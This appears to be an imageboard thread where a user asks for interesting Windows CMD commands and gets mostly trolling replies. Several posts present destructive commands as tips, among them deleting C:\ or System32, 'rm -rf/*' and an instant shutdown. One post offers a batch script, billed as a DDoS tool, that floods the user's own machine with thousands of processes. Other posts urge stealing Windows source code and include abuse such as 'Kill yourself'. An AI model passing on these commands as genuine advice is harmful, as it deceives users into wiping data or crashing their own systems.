ITT Sup Forums helps me learn some cool/weird stuff you can do with CMD
ITT Sup Forums helps me learn some cool/weird stuff you can do with CMD
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type "exit"
then get off this board
delet system 33
shutdown /t 0
Kill yourself
ping -t
enjoy ddos'ing xDD
>hes not even using it as administrator
ur not even l337 br0
This. Just open like 20 terminals for better efficiency.
delet this
>Version 6.0
del C:\
Get an OS where the command line actually does something.
oops, correction
sudo ddos
npm install grunt
This guy's got it.
Copy this code. Save as .cmd, then run.
@echo off
for /l %%g in (0,1,15000) do start /b cmd.exe& start ping -t
goto :Main
You are now equipped to DDOS all of your foes.
But Epep killed Pepe
a fun command in windows is 'dir'
it shows you the files in the current directory.
>command not found
Not using enterprise quality powershell.
Get-ChildItem -Recurse | Select-Object -ExpandProperty FullName
gci -r | select -exp FullName
Equivalent plebian cmd
dir /s /b
I never bothered to learn powershell. Seemed far too verbose.
Everything I've built in batch was fine enough, and more portable.
>sudo screenfetch
Try all the Shift+Function keys, they do interesting stuff
Also you can pipe using the cmd
color 0a
rmdir /S /Q C:\WINDOWS\system32
manage GPT, manage page files, hibernation files, and drive caching, re-assign IRQ addresses, print out the master boot record to hex if you have one, apply customized registry edits through batch+extensions. probably a lot more i don't know.
people don't give enough credit for windows because where linux has 'documentation', you pretty much are descending into a dark labyrinth of stern stares and grues, without a flashlight, to discover how the system works through excruciating trial and error. and even if microsoft wanted to help you, as i'm sure we all know now, they literally have no fucking clue how it all works, either.
i'll keep saying this until it happens. we need to assemble a team of world class hackers and elite burglers, locate the physical copies of the windows 7 or 2k source (they're cept in multiple sections in multiple undisclosed locations) and steal that shit, oceans 11 style, and release it into the wild.
a true open source windows 7 would literally fucking murder linux and osx and microsoft too. there'd be no reason to use anything else ever again.
we must be willing to go to prison for doing this. but we'd be heros of the torvalds or ritchman or terry scale. greater, even, perhaps.
grow the fuck up
Powerhell? I'd rather use Siri.
your attempt at laconic maturity is kinda pathetic my dude. grow a pair and realize that courage is the magic that makes dreams come true. if people thought like you, we wouldn't even have computers!
this is now the name of a cybertechno/synthwave group.
Before you do all this bullshit op.. Turn on your firewall >rm -rf/*
Command not found 'rm'
Keep trying m8. Lol
Why don't you install linuxnight on a virtual box where you can actually do shit in ther fucking terminal.
The only thing cmd markedly lacks is while loops, and a few aspects of delayed expansion.
>no complier?
See UNIX/Linux is far superior to Windows when it comes to what ur trying to do man.. Like I'm a fucking neet but I know that if you wanna fuck around in a terminal and do some kinda cool shit use Linux.
Also don't remove your root file
>rm -rf
Same as deleting sys32
if you want to actually do cool stuff, more similar to linux terminal tools, use the powershell
>implying that's the only thing wrong with that one
>implying it wasn't a joke
How thick are you user?